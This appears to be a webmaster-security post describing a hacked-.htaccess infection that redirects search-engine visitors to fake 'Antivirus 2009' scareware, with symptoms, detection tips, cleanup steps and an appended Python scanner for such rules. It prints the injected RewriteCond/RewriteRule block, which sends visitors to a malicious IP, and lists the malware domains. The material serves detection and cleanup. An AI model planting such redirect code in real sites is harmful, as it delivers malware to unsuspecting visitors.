Symptoms

  1. Abrupt drop in search engine traffic, almost to zero. – always
  2. People complain that when they visit your site, it says their computer is infected with spyware and forces them to install Antivirus 2009, but when you open the site yourself, you don’t see anything suspicious. – if your site visitors care enough to complain
  3. Warnings in Google search results that visiting your site may harm your computer. – only if Google has already detected the exploit. This may be a sign of some other exploit as well.
  4. Firefox 3 and Google Chrome won’t let anyone visit your site and warn web surfers that your site is an “attack site”. – only if Google (Firefox uses Google’s database) has already detected the exploit. This may be a sign of some other exploit as well.

How to detect?

The easiest and safest way to detect this exploit is to use Unmask Parasites. Just enter the site address and click “Check”. Your site is infected if the report contains this chain of four redirects:

302 -> http://89.28.13.204/in.html?s=xx
302 -> http://wwwinfoclick.com/soft.php?aid=0865&d=1&product=XPA&refer=ff94bbac7
302 -> http://defense-live-scan.com/2009/1/freescan.php?nu=880865
302 -> http://defense-live-scan.com/2009/1/en/freescan.php?id=880865

The domain names and IP addresses may vary but the pattern will be the same:

  1. The first redirect goes to an IP address (89.28.13.20x, 87.248.180.90, maseo .ru/ h.php)
  2. The second redirect goes to a soft.php script on some domain (wwwinfoclick.com, privatewebsphere.com, clicksoverview.com, proweb-info.com, etc.)
  3. The third and fourth redirects go to freescan.php scripts on the same site (defense-live-scan.com, antivirus-protectionscan.com, antivirusdefense.com, computerquickscanner .com, pro-scanner-online .com, antivirus-bestscan.com, pcantivirusscan.com, anti-virus-live-scanner.com, etc.) and there is “2009” in the path.

Alternatively, you can search for your site on major search engines and click the search results. I don’t suggest that you do it in IE with JavaScript turned on though…

How to clean up?

  1. In the root of your web server, find the .htaccess file. It’s a hidden file so you might need to configure your FTP client to show hidden files.
  2. Open this file and locate the following code:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://87.248.180.90/in.html?s=ipw2 [R,L]

    The IP address may be slightly different, and there may be a couple of screens of blank lines before this code, so you’ll need to scroll down to find it.
  3. Delete this code.
  4. Don’t delete .htaccess even if there is no other code in this file or you simply don’t need it. Just leave an empty file.
  5. Assign this file “644” permissions (everyone can read, but only the owner can write) so that no one else can modify it.
    If you have command-line access, use the following command: chmod 644 .htaccess
    If you only have FTP access, check your FTP client’s documentation on how to change file permissions. (All decent FTP clients have this feature.)
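To help locate the injected block described in steps 1–3 (possibly buried after screens of blank lines), here is an added Python scanner that is not part of the original post. It reads .htaccess text, collects RewriteCond lines that test HTTP_REFERER for search-engine names, and reports any following RewriteRule that sends visitors to an absolute external URL; the sample .htaccess is constructed, with the redirect target taken from the post.

```python
import re
from ipaddress import ip_address

# Search-engine names the injected RewriteCond lines test the Referer for (from the post).
SEARCH_ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo")

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)


def _absolute_host(target):
    """Return the host of an absolute http(s) URL, or None for a local rewrite target."""
    m = re.match(r"https?://([^/:?#]+)", target, re.I)
    return m.group(1) if m else None


def _is_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def find_referer_redirects(htaccess_text):
    """Find RewriteRules that redirect search-engine visitors to an external URL.

    Returns a list of dicts: line (1-based), target, engines (sorted, deduplicated),
    ip_host (True when the target host is a bare IP address, as in the post's sample).
    """
    findings = []
    pending = []  # search-engine names seen in RewriteCond lines since the last RewriteRule
    for line_no, line in enumerate(htaccess_text.splitlines(), 1):
        cond = COND_RE.match(line)
        if cond:
            pattern = cond.group(1).lower()
            pending.extend(e for e in SEARCH_ENGINES if e in pattern)
            continue
        rule = RULE_RE.match(line)
        if rule:  # RewriteCond lines attach to the next RewriteRule, blank lines do not matter
            target = rule.group(2)
            host = _absolute_host(target)
            if pending and host:
                findings.append({"line": line_no, "target": target,
                                 "engines": sorted(set(pending)), "ip_host": _is_ip(host)})
            pending = []
    return findings


SAMPLE_HTACCESS = """\
# BEGIN WordPress (legitimate block, constructed for this example)
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress



RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.90/in.html?s=ipw2 [R,L]
"""

if __name__ == "__main__":
    for f in find_referer_redirects(SAMPLE_HTACCESS):
        print(f"line {f['line']}: redirects {f['engines']} visitors to {f['target']}")
```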